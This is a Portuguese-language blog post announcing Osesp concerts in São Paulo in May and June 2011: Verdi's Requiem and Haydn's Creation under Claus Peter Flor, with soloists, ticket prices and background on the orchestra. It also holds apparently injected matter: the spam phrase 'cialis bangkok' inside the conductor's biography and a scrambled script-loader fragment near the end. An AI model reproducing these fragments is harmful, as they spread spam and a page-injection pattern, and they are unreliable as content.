Música coralMúsica sinfônicaProgramaçãoSão Paulo

OSESP – semanas de 26 a 29 de maio e de 2 a 4 de junho de 2011

Osesp interpreta a Missa de Réquiem, de Verdi, e a Criação, de Haydn, sob regência de Claus Peter Flor.

Confira a programação dos ensaios e da Missa.

ENSAIOS ABERTOS

Quinta, 26/5, 18h (Réquiem)

Quinta, 2/6, 10h (A Criação)

Ingressos: R$ 10,00


MISSA DE RÉQUIEM, DE VERDI

Sexta, 27/5 (21h)

Sábado, 28/5 (16h30)

Domingo, 29/5 (17h)

Ingressos: de R$ 24,00 a R$ 135,00

A CRIAÇÃO, DE HAYDN

Quinta, 2/6 (21h)

Sexta, 3/6 (21h)

Sábado, 4/6 (16h30)

Ingressos: de R$ 24,00 a R$ 135,00

MISSA DE RÉQUIEM, DE VERDI

PARTICIPAÇÔES: CORO DA OSESP E CORAL LÍRICO DE MINAS GERAIS

SOLISTAS:

– CHRISTINE BREWER – soprano

– LILLI PAASIKIVI – mezzo soprano

– MARIUS MANEA – tenor

– REINHARD HAGEN – baixo

*** INGRESSOS ESGOTADOS ***

A CRIAÇÃO, DE HAYDN

Participação: CORO DA OSESP

Solistas:

– LISA MILNE – SOPRANO

– JAMES GILCHRIST – tenor

DOMINIK WÖRNERbaixo-barítono
Duas obras-primas da música ocidental poderão ser ouvidas em seis concertos que a Osesp realiza sob regência do maestro alemão Claus Peter Flor, com participação de renomados solistas internacionais.

A Missa de Réquiem, de Verdi, nos dias 27, 28 e 29 de maio, e A Criação, de Haydn, nos dias 02, 03 e 04 de junho, apresentam respectivamente o sombrio e o luminoso, o terrífico e o radiante, o dramático e o bucólico, a expressão dolorosa da morte e a celebração otimista da vida.

Importante:
o Ensaio Aberto da primeira semana acontecerá na quinta, 26/5, às 18h, e não às 10h como de costume.


Claus Peter Flor

Nascido em Leipzig, Claus Peter Flor estudou regência sob orientação de Rolf Reuter, Rafael Kubelik e Kurt Sanderling. Em 1988, fez sua estreia com a Orquestra Filarmônica de Berlim. Desde então, foi principal regente convidado da Orquestra Philharmonia (1991-1994) e da Orquestra Sinônica de Dallas (1999-2008). Atualmente, é o diretor musical da Orquestra Filarmônica da Malásia.

Como regente de ópera, apresenta-se regularmente nos principais teatros da Alemanha e da França. Em 2011, além da Osesp, dirigirá a Orquestra Nacional Russa, a Filarmônica de Varsóvia, a Real Filarmônica de Liverpool e a Sinfônica de Tóquio, entre cialis bangkok outras orquestras renomadas.

Osesp

Desde 1954, a Osesp trilha uma história de conquistas, tornando-se uma instituição reconhecida nacional e internacionalmente pela excelência. Foi dirigida pelo maestro Souza Lima e pelo italiano Bruno Roccella, mais tarde sucedidos por Eleazar de Carvalho, que por 24 anos permaneceu à frente da Orquestra, deixando um projeto para sua reformulação.

Com o apoio do Secretário de Cultura e o empenho do Governador Mario Covas, em 1997, o maestro John Neschling foi escolhido para assumir a direção artística e conduzir uma nova fase na história da Osesp. A Sala São Paulo é inaugurada em 1999 e, nos anos seguintes, são criados os coros Sinfônico, de Câmara, Juvenil e Infantil; o Centro de Documentação Musical Maestro Eleazar de Carvalho; o Serviço de Assinaturas; o Serviço de Voluntários; os Programas Educacionais; a editora de partituras Criadores do Brasil e a Academia da Osesp.

Em maio de 2009, a Osesp ganha o XII Prêmio Carlos Gomes na categoria Orquestra Sinfônica, pelo conjunto de apresentações realizadas durante o ano de 2008. Indicada pela revista inglesa Gramophone como uma das três orquestras emergentes no mundo às quais se deve prestar atenção, a Osesp dá continuidade ao projeto de ampliação constante da cultura musical brasileira. Desde 2010, a Orquestra conta com o maestro francês Yan Pascal Tortelier como regente titular e o músico e escritor Arthur Nestrovski como diretor artístico. Em 2012, a maestrina norte-americana Marin Alsop assumirá o posto de regente principal da Osesp por um período inicial de cinco anos.

Fundação Osesp

Instituída em junho de 2005, a Fundação Osesp administra a Orquestra, a Sala São Paulo e as relações de trabalho de mais de 290 pessoas, entre músicos, administração e técnicos, permitindo maior agilidade administrativa, ampliação de parcerias e melhoria na qualidade dos serviços oferecidos.

Os concertos da Osesp são patrocinados por Itaú Personnalité, Banco do Brasil, Mercedes-Benz, Credit Suisse e Mapfre Seguros.

d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.